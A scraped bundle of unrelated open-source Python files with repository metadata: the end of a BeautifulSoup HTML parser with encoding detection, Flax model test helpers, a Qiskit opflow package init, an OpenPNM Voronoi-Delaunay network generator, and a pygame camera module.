'tr' : ['table', 'tbody', 'tfoot', 'thead'],
'td' : ['tr'],
'th' : ['tr'],
'thead' : ['table'],
'tbody' : ['table'],
'tfoot' : ['table'],
}
NON_NESTABLE_BLOCK_TAGS = ['address', 'form', 'p', 'pre']
#If one of these tags is encountered, all tags up to the next tag of
#this type are popped.
RESET_NESTING_TAGS = buildTagMap(None, NESTABLE_BLOCK_TAGS, 'noscript',
NON_NESTABLE_BLOCK_TAGS,
NESTABLE_LIST_TAGS,
NESTABLE_TABLE_TAGS)
NESTABLE_TAGS = buildTagMap([], NESTABLE_INLINE_TAGS, NESTABLE_BLOCK_TAGS,
NESTABLE_LIST_TAGS, NESTABLE_TABLE_TAGS)
# Used to detect the charset in a META tag; see start_meta
CHARSET_RE = re.compile("((^|;)\s*charset=)([^;]*)", re.M)
def extractCharsetFromMeta(self, attrs):
"""Beautiful Soup can detect a charset included in a META tag,
try to convert the document to that charset, and re-parse the
document from the beginning."""
httpEquiv = None
contentType = None
contentTypeIndex = None
tagNeedsEncodingSubstitution = False
for i in range(0, len(attrs)):
key, value = attrs[i]
key = key.lower()
if key == 'http-equiv':
httpEquiv = value
elif key == 'content':
contentType = value
contentTypeIndex = i
if httpEquiv and contentType: # It's an interesting meta tag.
match = self.CHARSET_RE.search(contentType)
if match:
if (self.declaredHTMLEncoding is not None or
self.originalEncoding == self.fromEncoding):
# An HTML encoding was sniffed while converting
# the document to Unicode, or an HTML encoding was
# sniffed during a previous pass through the
# document, or an encoding was specified
# explicitly and it worked. Rewrite the meta tag.
def rewrite(match):
return match.group(1) + "%SOUP-ENCODING%"
newAttr = self.CHARSET_RE.sub(rewrite, contentType)
attrs[contentTypeIndex] = (attrs[contentTypeIndex][0],
newAttr)
tagNeedsEncodingSubstitution = True
else:
# This is our first pass through the document.
# Go through it again with the encoding information.
newCharset = match.group(3)
if newCharset and newCharset != self.originalEncoding:
self.declaredHTMLEncoding = newCharset
self._feed(self.declaredHTMLEncoding)
raise StopParsing
pass
tag = self.unknown_starttag("meta", attrs)
if tag and tagNeedsEncodingSubstitution:
tag.containsSubstitutions = True
class StopParsing(Exception):
pass
class ICantBelieveItsBeautifulSoup(BeautifulSoup):
"""The BeautifulSoup class is oriented towards skipping over
common HTML errors like unclosed tags. However, sometimes it makes
errors of its own. For instance, consider this fragment:
<b>Foo<b>Bar</b></b>
This is perfectly valid (if bizarre) HTML. However, the
BeautifulSoup class will implicitly close the first b tag when it
encounters the second 'b'. It will think the author wrote
"<b>Foo<b>Bar", and didn't close the first 'b' tag, because
there's no real-world reason to bold something that's already
bold. When it encounters '</b></b>' it will close two more 'b'
tags, for a grand total of three tags closed instead of two. This
can throw off the rest of your document structure. The same is
true of a number of other tags, listed below.
It's much more common for someone to forget to close a 'b' tag
than to actually use nested 'b' tags, and the BeautifulSoup class
handles the common case. This class handles the not-co-common
case: where you can't believe someone wrote what they did, but
it's valid HTML and BeautifulSoup screwed up by assuming it
wouldn't be."""
I_CANT_BELIEVE_THEYRE_NESTABLE_INLINE_TAGS = \
['em', 'big', 'i', 'small', 'tt', 'abbr', 'acronym', 'strong',
'cite', 'code', 'dfn', 'kbd', 'samp', 'strong', 'var', 'b',
'big']
I_CANT_BELIEVE_THEYRE_NESTABLE_BLOCK_TAGS = ['noscript']
NESTABLE_TAGS = buildTagMap([], BeautifulSoup.NESTABLE_TAGS,
I_CANT_BELIEVE_THEYRE_NESTABLE_BLOCK_TAGS,
I_CANT_BELIEVE_THEYRE_NESTABLE_INLINE_TAGS)
class MinimalSoup(BeautifulSoup):
"""The MinimalSoup class is for parsing HTML that contains
pathologically bad markup. It makes no assumptions about tag
nesting, but it does know which tags are self-closing, that
<script> tags contain Javascript and should not be parsed, that
META tags may contain encoding information, and so on.
This also makes it better for subclassing than BeautifulStoneSoup
or BeautifulSoup."""
RESET_NESTING_TAGS = buildTagMap('noscript')
NESTABLE_TAGS = {}
class BeautifulSOAP(BeautifulStoneSoup):
"""This class will push a tag with only a single string child into
the tag's parent as an attribute. The attribute's name is the tag
name, and the value is the string child. An example should give
the flavor of the change:
<foo><bar>baz</bar></foo>
=>
<foo bar="baz"><bar>baz</bar></foo>
You can then access fooTag['bar'] instead of fooTag.barTag.string.
This is, of course, useful for scraping structures that tend to
use subelements instead of attributes, such as SOAP messages. Note
that it modifies its input, so don't print the modified version
out.
I'm not sure how many people really want to use this class; let me
know if you do. Mainly I like the name."""
def popTag(self):
if len(self.tagStack) > 1:
tag = self.tagStack[-1]
parent = self.tagStack[-2]
parent._getAttrMap()
if (isinstance(tag, Tag) and len(tag.contents) == 1 and
isinstance(tag.contents[0], NavigableString) and
not parent.attrMap.has_key(tag.name)):
parent[tag.name] = tag.contents[0]
BeautifulStoneSoup.popTag(self)
#Enterprise class names! It has come to our attention that some people
#think the names of the Beautiful Soup parser classes are too silly
#and "unprofessional" for use in enterprise screen-scraping. We feel
#your pain! For such-minded folk, the Beautiful Soup Consortium And
#All-Night Kosher Bakery recommends renaming this file to
#"RobustParser.py" (or, in cases of extreme enterprisiness,
#"RobustParserBeanInterface.class") and using the following
#enterprise-friendly class aliases:
class RobustXMLParser(BeautifulStoneSoup):
pass
class RobustHTMLParser(BeautifulSoup):
pass
class RobustWackAssHTMLParser(ICantBelieveItsBeautifulSoup):
pass
class RobustInsanelyWackAssHTMLParser(MinimalSoup):
pass
class SimplifyingSOAPParser(BeautifulSOAP):
pass
######################################################
#
# Bonus library: Unicode, Dammit
#
# This class forces XML data into a standard format (usually to UTF-8
# or Unicode). It is heavily based on code from Mark Pilgrim's
# Universal Feed Parser. It does not rewrite the XML or HTML to
# reflect a new encoding: that happens in BeautifulStoneSoup.handle_pi
# (XML) and BeautifulSoup.start_meta (HTML).
# Autodetects character encodings.
# Download from http://chardet.feedparser.org/
try:
import chardet
# import chardet.constants
# chardet.constants._debug = 1
except ImportError:
chardet = None
# cjkcodecs and iconv_codec make Python know about more character encodings.
# Both are available from http://cjkpython.i18n.org/
# They're built in if you use Python 2.4.
try:
import cjkcodecs.aliases
except ImportError:
pass
try:
import iconv_codec
except ImportError:
pass
class UnicodeDammit:
"""A class for detecting the encoding of a *ML document and
converting it to a Unicode string. If the source encoding is
windows-1252, can replace MS smart quotes with their HTML or XML
equivalents."""
# This dictionary maps commonly seen values for "charset" in HTML
# meta tags to the corresponding Python codec names. It only covers
# values that aren't in Python's aliases and can't be determined
# by the heuristics in find_codec.
CHARSET_ALIASES = { "macintosh" : "mac-roman",
"x-sjis" : "shift-jis" }
def __init__(self, markup, overrideEncodings=[],
smartQuotesTo='xml', isHTML=False):
self.declaredHTMLEncoding = None
self.markup, documentEncoding, sniffedEncoding = \
self._detectEncoding(markup, isHTML)
self.smartQuotesTo = smartQuotesTo
self.triedEncodings = []
if markup == '' or isinstance(markup, unicode):
self.originalEncoding = None
self.unicode = unicode(markup)
return
u = None
for proposedEncoding in overrideEncodings:
u = self._convertFrom(proposedEncoding)
if u: break
if not u:
for proposedEncoding in (documentEncoding, sniffedEncoding):
u = self._convertFrom(proposedEncoding)
if u: break
# If no luck and we have auto-detection library, try that:
if not u and chardet and not isinstance(self.markup, unicode):
u = self._convertFrom(chardet.detect(self.markup)['encoding'])
# As a last resort, try utf-8 and windows-1252:
if not u:
for proposed_encoding in ("utf-8", "windows-1252"):
u = self._convertFrom(proposed_encoding)
if u: break
self.unicode = u
if not u: self.originalEncoding = None
def _subMSChar(self, match):
"""Changes a MS smart quote character to an XML or HTML
entity."""
orig = match.group(1)
sub = self.MS_CHARS.get(orig)
if type(sub) == types.TupleType:
if self.smartQuotesTo == 'xml':
sub = '&#x'.encode() + sub[1].encode() + ';'.encode()
else:
sub = '&'.encode() + sub[0].encode() + ';'.encode()
else:
sub = sub.encode()
return sub
def _convertFrom(self, proposed):
proposed = self.find_codec(proposed)
if not proposed or proposed in self.triedEncodings:
return None
self.triedEncodings.append(proposed)
markup = self.markup
# Convert smart quotes to HTML if coming from an encoding
# that might have them.
if self.smartQuotesTo and proposed.lower() in("windows-1252",
"iso-8859-1",
"iso-8859-2"):
smart_quotes_re = "([\x80-\x9f])"
smart_quotes_compiled = re.compile(smart_quotes_re)
markup = smart_quotes_compiled.sub(self._subMSChar, markup)
try:
# print "Trying to convert document to %s" % proposed
u = self._toUnicode(markup, proposed)
self.markup = u
self.originalEncoding = proposed
except Exception, e:
# print "That didn't work!"
# print e
return None
#print "Correct encoding: %s" % proposed
return self.markup
def _toUnicode(self, data, encoding):
'''Given a string and its encoding, decodes the string into Unicode.
%encoding is a string recognized by encodings.aliases'''
# strip Byte Order Mark (if present)
if (len(data) >= 4) and (data[:2] == '\xfe\xff') \
and (data[2:4] != '\x00\x00'):
encoding = 'utf-16be'
data = data[2:]
elif (len(data) >= 4) and (data[:2] == '\xff\xfe') \
and (data[2:4] != '\x00\x00'):
encoding = 'utf-16le'
data = data[2:]
elif data[:3] == '\xef\xbb\xbf':
encoding = 'utf-8'
data = data[3:]
elif data[:4] == '\x00\x00\xfe\xff':
encoding = 'utf-32be'
data = data[4:]
elif data[:4] == '\xff\xfe\x00\x00':
encoding = 'utf-32le'
data = data[4:]
newdata = unicode(data, encoding)
return newdata
def _detectEncoding(self, xml_data, isHTML=False):
"""Given a document, tries to detect its XML encoding."""
xml_encoding = sniffed_xml_encoding = None
try:
if xml_data[:4] == '\x4c\x6f\xa7\x94':
# EBCDIC
xml_data = self._ebcdic_to_ascii(xml_data)
elif xml_data[:4] == '\x00\x3c\x00\x3f':
# UTF-16BE
sniffed_xml_encoding = 'utf-16be'
xml_data = unicode(xml_data, 'utf-16be').encode('utf-8')
elif (len(xml_data) >= 4) and (xml_data[:2] == '\xfe\xff') \
and (xml_data[2:4] != '\x00\x00'):
# UTF-16BE with BOM
sniffed_xml_encoding = 'utf-16be'
xml_data = unicode(xml_data[2:], 'utf-16be').encode('utf-8')
elif xml_data[:4] == '\x3c\x00\x3f\x00':
# UTF-16LE
sniffed_xml_encoding = 'utf-16le'
xml_data = unicode(xml_data, 'utf-16le').encode('utf-8')
elif (len(xml_data) >= 4) and (xml_data[:2] == '\xff\xfe') and \
(xml_data[2:4] != '\x00\x00'):
# UTF-16LE with BOM
sniffed_xml_encoding = 'utf-16le'
xml_data = unicode(xml_data[2:], 'utf-16le').encode('utf-8')
elif xml_data[:4] == '\x00\x00\x00\x3c':
# UTF-32BE
sniffed_xml_encoding = 'utf-32be'
xml_data = unicode(xml_data, 'utf-32be').encode('utf-8')
elif xml_data[:4] == '\x3c\x00\x00\x00':
# UTF-32LE
sniffed_xml_encoding = 'utf-32le'
xml_data = unicode(xml_data, 'utf-32le').encode('utf-8')
elif xml_data[:4] == '\x00\x00\xfe\xff':
# UTF-32BE with BOM
sniffed_xml_encoding = 'utf-32be'
xml_data = unicode(xml_data[4:], 'utf-32be').encode('utf-8')
elif xml_data[:4] == '\xff\xfe\x00\x00':
# UTF-32LE with BOM
sniffed_xml_encoding = 'utf-32le'
xml_data = unicode(xml_data[4:], 'utf-32le').encode('utf-8')
elif xml_data[:3] == '\xef\xbb\xbf':
# UTF-8 with BOM
sniffed_xml_encoding = 'utf-8'
xml_data = unicode(xml_data[3:], 'utf-8').encode('utf-8')
else:
sniffed_xml_encoding = 'ascii'
pass
except:
xml_encoding_match = None
xml_encoding_re = '^<\?.*encoding=[\'"](.*?)[\'"].*\?>'.encode()
xml_encoding_match = re.compile(xml_encoding_re).match(xml_data)
if not xml_encoding_match and isHTML:
meta_re = '<\s*meta[^>]+charset=([^>]*?)[;\'">]'.encode()
regexp = re.compile(meta_re, re.I)
xml_encoding_match = regexp.search(xml_data)
if xml_encoding_match is not None:
xml_encoding = xml_encoding_match.groups()[0].decode(
'ascii').lower()
if isHTML:
self.declaredHTMLEncoding = xml_encoding
if sniffed_xml_encoding and \
(xml_encoding in ('iso-10646-ucs-2', 'ucs-2', 'csunicode',
'iso-10646-ucs-4', 'ucs-4', 'csucs4',
'utf-16', 'utf-32', 'utf_16', 'utf_32',
'utf16', 'u16')):
xml_encoding = sniffed_xml_encoding
return xml_data, xml_encoding, sniffed_xml_encoding
def find_codec(self, charset):
return self._codec(self.CHARSET_ALIASES.get(charset, charset)) \
or (charset and self._codec(charset.replace("-", ""))) \
or (charset and self._codec(charset.replace("-", "_"))) \
or charset
def _codec(self, charset):
if not charset: return charset
codec = None
try:
codecs.lookup(charset)
codec = charset
except (LookupError, ValueError):
pass
return codec
EBCDIC_TO_ASCII_MAP = None
def _ebcdic_to_ascii(self, s):
c = self.__class__
if not c.EBCDIC_TO_ASCII_MAP:
emap = (0,1,2,3,156,9,134,127,151,141,142,11,12,13,14,15,
16,17,18,19,157,133,8,135,24,25,146,143,28,29,30,31,
128,129,130,131,132,10,23,27,136,137,138,139,140,5,6,7,
144,145,22,147,148,149,150,4,152,153,154,155,20,21,158,26,
32,160,161,162,163,164,165,166,167,168,91,46,60,40,43,33,
38,169,170,171,172,173,174,175,176,177,93,36,42,41,59,94,
45,47,178,179,180,181,182,183,184,185,124,44,37,95,62,63,
186,187,188,189,190,191,192,193,194,96,58,35,64,39,61,34,
195,97,98,99,100,101,102,103,104,105,196,197,198,199,200,
201,202,106,107,108,109,110,111,112,113,114,203,204,205,
206,207,208,209,126,115,116,117,118,119,120,121,122,210,
211,212,213,214,215,216,217,218,219,220,221,222,223,224,
225,226,227,228,229,230,231,123,65,66,67,68,69,70,71,72,
73,232,233,234,235,236,237,125,74,75,76,77,78,79,80,81,
82,238,239,240,241,242,243,92,159,83,84,85,86,87,88,89,
90,244,245,246,247,248,249,48,49,50,51,52,53,54,55,56,57,
250,251,252,253,254,255)
import string
c.EBCDIC_TO_ASCII_MAP = string.maketrans( \
''.join(map(chr, range(256))), ''.join(map(chr, emap)))
return s.translate(c.EBCDIC_TO_ASCII_MAP)
MS_CHARS = { '\x80' : ('euro', '20AC'),
'\x81' : ' ',
'\x82' : ('sbquo', '201A'),
'\x83' : ('fnof', '192'),
'\x84' : ('bdquo', '201E'),
'\x85' : ('hellip', '2026'),
'\x86' : ('dagger', '2020'),
'\x87' : ('Dagger', '2021'),
'\x88' : ('circ', '2C6'),
'\x89' : ('permil', '2030'),
'\x8A' : ('Scaron', '160'),
'\x8B' : ('lsaquo', '2039'),
'\x8C' : ('OElig', '152'),
'\x8D' : '?',
'\x8E' : ('#x17D', '17D'),
'\x8F' : '?',
'\x90' : '?',
'\x91' : ('lsquo', '2018'),
'\x92' : ('rsquo', '2019'),
'\x93' : ('ldquo', '201C'),
'\x94' : ('rdquo', '201D'),
'\x95' : ('bull', '2022'),
'\x96' : ('ndash', '2013'),
'\x97' : ('mdash', '2014'),
'\x98' : ('tilde', '2DC'),
'\x99' : ('trade', '2122'),
'\x9a' : ('scaron', '161'),
'\x9b' : ('rsaquo', '203A'),
'\x9c' : ('oelig', '153'),
'\x9d' : '?',
'\x9e' : ('#x17E', '17E'),
'\x9f' : ('Yuml', ''),}
#######################################################################
#By default, act as an HTML pretty-printer.
if __name__ == '__main__':
import sys
soup = BeautifulSoup(sys.stdin)
print soup.prettify()
| {
"content_hash": "ba72c426c9d266512e217ef1625238a7",
"timestamp": "",
"source": "github",
"line_count": 2000,
"max_line_length": 186,
"avg_line_length": 39.501,
"alnum_prop": 0.5737196526670211,
"repo_name": "sniemi/SamPy",
"id": "6a327212aa472628da8e5328adb3ac513c17e3c3",
"size": "79002",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "parsing/BeautifulSoup.py",
"mode": "33188",
"license": "bsd-2-clause",
"language": [
{
"name": "Batchfile",
"bytes": "296"
},
{
"name": "C",
"bytes": "68436"
},
{
"name": "C++",
"bytes": "45956"
},
{
"name": "CSS",
"bytes": "35570"
},
{
"name": "Fortran",
"bytes": "45191"
},
{
"name": "HTML",
"bytes": "107435"
},
{
"name": "IDL",
"bytes": "13651"
},
{
"name": "JavaScript",
"bytes": "25435"
},
{
"name": "Makefile",
"bytes": "26035"
},
{
"name": "Matlab",
"bytes": "1508"
},
{
"name": "Perl",
"bytes": "59198"
},
{
"name": "PostScript",
"bytes": "1403536"
},
{
"name": "Prolog",
"bytes": "16061"
},
{
"name": "Python",
"bytes": "5763358"
},
{
"name": "R",
"bytes": "208346"
},
{
"name": "Rebol",
"bytes": "161"
},
{
"name": "Roff",
"bytes": "73616"
},
{
"name": "Ruby",
"bytes": "2032"
},
{
"name": "Shell",
"bytes": "41512"
},
{
"name": "Tcl",
"bytes": "44150"
},
{
"name": "TeX",
"bytes": "107783"
}
],
"symlink_target": ""
} |
"""Utilities for model tests."""
from flax import linen as nn
from jax import random
import jax.numpy as jnp
def get_common_model_test_inputs():
"""Get common inputs for model tests."""
rng = random.PRNGKey(0)
batch_size = 4
seq_len = 16
inputs = jnp.ones((batch_size, seq_len), dtype=jnp.int32)
shared_args = {
"vocab_size": 20,
"emb_dim": 10,
"qkv_dim": 8,
"mlp_dim": 16,
"num_heads": 2,
"max_len": seq_len,
"train": False,
}
shared_embedding = nn.Embed(
num_embeddings=shared_args["vocab_size"],
features=shared_args["emb_dim"],
embedding_init=nn.initializers.normal(stddev=1.0))
shared_args["shared_embedding"] = shared_embedding
return rng, inputs, shared_args
def get_small_model_test_inputs():
"""Get small inputs for slow model tests (e.g. jit)."""
rng = random.PRNGKey(0)
batch_size = 1
seq_len = 16
inputs = jnp.ones((batch_size, seq_len), dtype=jnp.int32)
shared_args = {
"vocab_size": 2,
"emb_dim": 2,
"qkv_dim": 2,
"mlp_dim": 2,
"num_heads": 2,
"max_len": seq_len,
"train": False,
}
shared_embedding = nn.Embed(
num_embeddings=shared_args["vocab_size"],
features=shared_args["emb_dim"],
embedding_init=nn.initializers.normal(stddev=1.0))
shared_args["shared_embedding"] = shared_embedding
return rng, inputs, shared_args
| {
"content_hash": "6df8876cb153f0852e8902fa9f09172d",
"timestamp": "",
"source": "github",
"line_count": 52,
"max_line_length": 59,
"avg_line_length": 26.923076923076923,
"alnum_prop": 0.6192857142857143,
"repo_name": "google-research/pegasus",
"id": "c7aa39d33b8933762d33247d26860ea7037c60b9",
"size": "1986",
"binary": false,
"copies": "1",
"ref": "refs/heads/main",
"path": "pegasus/flax/models/encoders/test_utils.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "C++",
"bytes": "112333"
},
{
"name": "HTML",
"bytes": "1952"
},
{
"name": "Python",
"bytes": "673550"
}
],
"symlink_target": ""
} |
"""
Primitive Operators (:mod:`qiskit.opflow.primitive_ops`)
========================================================
.. currentmodule:: qiskit.opflow.primitive_ops
Operators are defined to be functions which take State functions to State functions.
PrimitiveOps are the classes for representing basic Operators, backed by computational
Operator primitives from Terra. These classes (and inheritors) primarily serve to allow the
underlying primitives to "flow" - i.e. interoperability and adherence to the Operator
formalism - while the core computational logic mostly remains in the underlying primitives.
For example, we would not produce an interface in Terra in which
``QuantumCircuit1 + QuantumCircuit2`` equaled the Operator sum of the circuit
unitaries, rather than simply appending the circuits. However, within the Operator
flow summing the unitaries is the expected behavior.
Note:
All mathematical methods are not in-place, meaning that they return a
new object, but the underlying primitives are not copied.
Primitive Operators
-------------------
.. autosummary::
:toctree: ../stubs/
:template: autosummary/class_no_inherited_members.rst
PrimitiveOp
CircuitOp
MatrixOp
PauliOp
PauliSumOp
TaperedPauliSumOp
Symmetries
----------
.. autosummary::
:toctree: ../stubs/
:template: autosummary/class_no_inherited_members.rst
Z2Symmetries
"""
from .primitive_op import PrimitiveOp
from .pauli_op import PauliOp
from .matrix_op import MatrixOp
from .circuit_op import CircuitOp
from .pauli_sum_op import PauliSumOp
from .tapered_pauli_sum_op import TaperedPauliSumOp, Z2Symmetries
__all__ = [
"PrimitiveOp",
"PauliOp",
"MatrixOp",
"CircuitOp",
"PauliSumOp",
"TaperedPauliSumOp",
"Z2Symmetries",
]
| {
"content_hash": "958dfb3a5d9e4764b910e4bb7b1803a7",
"timestamp": "",
"source": "github",
"line_count": 61,
"max_line_length": 91,
"avg_line_length": 29.262295081967213,
"alnum_prop": 0.726610644257703,
"repo_name": "QISKit/qiskit-sdk-py",
"id": "1af6558935993023bcf8ef93f694ff2624dc97f7",
"size": "2263",
"binary": false,
"copies": "1",
"ref": "refs/heads/main",
"path": "qiskit/opflow/primitive_ops/__init__.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Batchfile",
"bytes": "2582"
},
{
"name": "C++",
"bytes": "327518"
},
{
"name": "CMake",
"bytes": "19294"
},
{
"name": "Makefile",
"bytes": "5608"
},
{
"name": "Pascal",
"bytes": "2444"
},
{
"name": "Python",
"bytes": "1312801"
},
{
"name": "Shell",
"bytes": "8385"
}
],
"symlink_target": ""
} |
import scipy.spatial as sptl
import scipy.sparse as sprs
import numpy as np
from openpnm._skgraph.generators import tools
from openpnm._skgraph.operations import trim_nodes
from openpnm._skgraph.tools import isoutside, conns_to_am
from openpnm._skgraph.queries import find_neighbor_nodes
def voronoi_delaunay_dual(points, shape, trim=True, reflect=True,
node_prefix='node', edge_prefix='edge'):
r"""
Generate a dual Voronoi-Delaunay network from given base points
Parameters
----------
points : array_like or scalar
The points to be tessellated. If a scalar is given a set of points
of that size is generated inside the given ``shape``.
shape : array_like
The size of the domain in which the points lie
trim : bool, optional
If ``True`` (default) then all points lying beyond the given domain
shape will be removed
Returns
-------
network : dict
A dictionary containing 'node.coords' and 'edge.conns'
vor : Voronoi object
The Voronoi tessellation object produced by ``scipy.spatial.Voronoi``
tri : Delaunay object
The Delaunay triangulation object produced ``scipy.spatial.Delaunay``
"""
# Generate a set of base points if scalar was given
points = tools.parse_points(points=points, shape=shape, reflect=reflect)
# Generate mask to remove any dims with all 0's
mask = ~np.all(points == 0, axis=0)
# Perform tessellations
vor = sptl.Voronoi(points=points[:, mask])
tri = sptl.Delaunay(points=points[:, mask])
# Combine points
pts_all = np.vstack((vor.points, vor.vertices))
Nall = np.shape(pts_all)[0]
# Create adjacency matrix in lil format for quick construction
am = sprs.lil_matrix((Nall, Nall))
for ridge in vor.ridge_dict.keys():
# Make Delaunay-to-Delaunay connections
for i in ridge:
am.rows[i].extend([ridge[0], ridge[1]])
# Get Voronoi vertices for current ridge
row = vor.ridge_dict[ridge].copy()
# Index Voronoi vertex numbers by number of Delaunay points
row = [i + vor.npoints for i in row if i > -1]
# Make Voronoi-to-Delaunay connections
for i in ridge:
am.rows[i].extend(row)
# Make Voronoi-to-Voronoi connections
row.append(row[0])
for i in range(len(row)-1):
am.rows[row[i]].append(row[i+1])
# Finalize adjacency matrix by assigning data values
am.data = am.rows # Values don't matter, only shape, so use 'rows'
# Convert to COO format for direct acces to row and col
am = am.tocoo()
# Extract rows and cols
conns = np.vstack((am.row, am.col)).T
# Convert to sanitized adjacency matrix
am = conns_to_am(conns)
# Finally, retreive conns back from am
conns = np.vstack((am.row, am.col)).T
# Convert coords to 3D if necessary
# Rounding is crucial since some voronoi verts endup outside domain
pts_all = np.around(pts_all, decimals=10)
if mask.sum() < 3:
coords = np.zeros([pts_all.shape[0], 3], dtype=float)
coords[:, mask] = pts_all
else:
coords = pts_all
# Assign coords and conns to network dict
network = {}
network[node_prefix+'.coords'] = coords
network[edge_prefix+'.conns'] = conns
n_nodes = coords.shape[0]
n_edges = conns.shape[0]
# Label all pores and throats by type
network[node_prefix+'.delaunay'] = np.zeros(n_nodes, dtype=bool)
network[node_prefix+'.delaunay'][0:vor.npoints] = True
network[node_prefix+'.voronoi'] = np.zeros(n_nodes, dtype=bool)
network[node_prefix+'.voronoi'][vor.npoints:] = True
# Label throats between Delaunay pores
network[edge_prefix+'.delaunay'] = np.zeros(n_edges, dtype=bool)
Ts = np.all(network[edge_prefix+'.conns'] < vor.npoints, axis=1)
network[edge_prefix+'.delaunay'][Ts] = True
# Label throats between Voronoi pores
network[edge_prefix+'.voronoi'] = np.zeros(n_edges, dtype=bool)
Ts = np.all(network[edge_prefix+'.conns'] >= vor.npoints, axis=1)
network[edge_prefix+'.voronoi'][Ts] = True
# Label throats connecting a Delaunay and a Voronoi pore
Ts = np.sum(network[node_prefix+'.delaunay'][conns].astype(int), axis=1) == 1
network[edge_prefix+'.interconnect'] = Ts
# Identify and trim nodes outside the domain if requested
if trim:
inside_all = ~isoutside(network, shape=shape)
inside_delaunay = inside_all*network[node_prefix+'.delaunay']
outside_delaunay = (~inside_all)*network[node_prefix+'.delaunay']
neighbors = find_neighbor_nodes(network=network,
inds=np.where(inside_delaunay)[0],
include_input=True)
trim = np.ones([network[node_prefix+'.coords'].shape[0], ], dtype=bool)
trim[neighbors] = False # Keep all neighbors to internal delaunay nodes
trim[outside_delaunay] = True # Re-add external delaunay nodes to trim
network = trim_nodes(network=network, inds=np.where(trim)[0])
return network, vor, tri
if __name__ == "__main__":
from openpnm._skgraph.visualization import plot_edges
# dvd, vor, tri = voronoi_delaunay_dual(points=50, shape=[1, 0, 1])
# print(dvd.keys())
# print(dvd['node.coords'].shape)
# print(dvd['edge.conns'].shape)
# dvd, vor, tri = voronoi_delaunay_dual(points=50, shape=[1, 0, 1], trim=True)
# print(dvd.keys())
# print(dvd['node.coords'].shape)
# print(dvd['edge.conns'].shape)
shape = [1]
pts = tools.parse_points(points=1000, shape=shape, reflect=True)
vn, vor, tri = voronoi_delaunay_dual(points=pts, shape=shape, trim=True)
plot_edges(vn)
| {
"content_hash": "bd0b0bcf0d03d9a0a7e5292817540094",
"timestamp": "",
"source": "github",
"line_count": 143,
"max_line_length": 82,
"avg_line_length": 40.33566433566433,
"alnum_prop": 0.6437239944521498,
"repo_name": "PMEAL/OpenPNM",
"id": "fac3c1fd1bfff3b9b3b1cc9f2c4316374474baa8",
"size": "5768",
"binary": false,
"copies": "1",
"ref": "refs/heads/dev",
"path": "openpnm/_skgraph/generators/_voronoi_delaunay_dual.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Makefile",
"bytes": "375"
},
{
"name": "Python",
"bytes": "1437146"
}
],
"symlink_target": ""
} |
"""Camera control on a surface.
Camera is just a pygame surface, so treat it as such!
A camera allows you to have a viewport which is smaller than the size
of the surface you're hoping to pan that viewport around on. Think
about looking at a big painting through a paper towel tube.
Cameras have an output resolution it scales its viewport to, plus a
behavior which governs how a Camera pans on its associated surface.
"""
import pygame
class CameraOutOfBounds(Exception):
"""The subsurface, which is the camera's view,
goes beyond the surface the camera's viewing.
Camera has been moved so that its area exceeds
the surface it uses to make a subsurface.
Attributes:
camera (Camera):
"""
def __init__(self, camera):
super(CameraOutOfBounds, self).__init__(camera)
self.camera = camera
class CameraBehavior(object):
"""How a camera moves. How it handles boundaries,
character movement, etc.
This CameraBehavior, the default, keeps the focal rectangle
in the top left of the camera view.
You'll want to inherit this class when creating
a CameraBehavior, including overriding the
move method.
"""
@staticmethod
def move(camera, focal_rectangle):
"""Move the camera, keeping the focal rectangle in
the top left of the camera view.
This method should be overridden in a child class.
Arguments:
camera (sappho.camera.Camera): Associated
Sappho camera object to control.
focal_rectangle (pygame.Rect): Rectangle which
is used to possibly adjust camera position.
"""
scroll_position = focal_rectangle.topleft
camera.view_rect.topleft = scroll_position
class CameraCenterBehavior(CameraBehavior):
"""A camera behavior that centers the
focal rectangle on the screen.
Will not cause Camera.update_state() to raise
CameraOutOfBounds, because the move logic
prevents such from occuring!
"""
@staticmethod
def move(camera, focal_rectangle):
"""Move the camera, keeping the focal rectangle
in the center of the screen where possible.
Arguments:
camera (sappho.camera.Camera):
focal_rectangle (pygame.Rect): Rectangle which
is used to possibly adjust camera position.
"""
new_view_rect = camera.view_rect.copy()
new_view_rect.center = focal_rectangle.center
# Make sure the camera isn't centered in a way that
# exceeds the environment's dimensions (don't go off
# the map!)
if new_view_rect.left < 0:
new_view_rect.left = 0
if new_view_rect.top < 0:
new_view_rect.top = 0
if new_view_rect.bottom > camera.source_resolution[1]:
new_view_rect.bottom = camera.source_resolution[1]
if new_view_rect.right > camera.source_resolution[0]:
new_view_rect.right = camera.source_resolution[0]
camera.view_rect = new_view_rect
class Camera(pygame.surface.Surface):
"""Surface that acts as a scrollable view, with optional scaling
onto another surface.
Attributes:
source_resolution (tuple[int, int]): Maximum size of the
environment being portrayed. If you have a map with many
inconsistently sized layers, this should be the size of
all of those layers flattened onto a single new layer.
Anything beyond this size will not be on camera.
output_resolution (tuple[int, int]): Resolution to scale up the
view of the surface to
view_rect (pygame.Rect): Rectangle area of this camera's view,
which is used to create the subsurface, which is scaled
to output_resolution and blit to self/camera.
behavior (CameraBehavior): The initial behavior to use for this
Camera. The :py:class:`CameraBehavior <sappho.CameraBehavior>`
that this Camera uses to control movement.
"""
def __init__(self, source_resolution, output_resolution,
view_resolution, behavior=None):
"""Create a Camera!
Arguments:
view_resolution (tuple[int, int]): used to create
view_rect attribute.
"""
super(Camera, self).__init__(output_resolution)
self.source_surface = pygame.surface.Surface(source_resolution,
pygame.SRCALPHA)
self.source_resolution = source_resolution
self.output_resolution = output_resolution
self.view_rect = pygame.Rect((0, 0), view_resolution)
self.behavior = behavior or CameraBehavior()
def update_state(self, timedelta):
"""Update the Camera to point to the
current scroll position.
Gets the "view" from the current scroll position
and camera resolution. That view is used to create
a subsurface of the "source subsurface," scaled to
the target_resolution. The new subsurface is then
blit to the camera (which is a surface, itself!).
Arguments:
timedelta (None): This isn't used at all, but it
is included as an argument for consistency.
"""
try:
subsurface = self.source_surface.subsurface(self.view_rect)
except ValueError:
raise CameraOutOfBounds(self)
scaled_surface = pygame.transform.scale(subsurface,
self.output_resolution)
# Blit the scaled surface to this camera (which is also a surface)
super(Camera, self).blit(scaled_surface, (0, 0))
def scroll_to(self, focal_rectangle):
"""Scroll to the given focal rectangle using the current behavior.
Parameters:
focal_rectangle (pygame.Rect): Rectangle to possibly update
the view position to using the camera's current behavior
"""
self.behavior.move(self, focal_rectangle)
| {
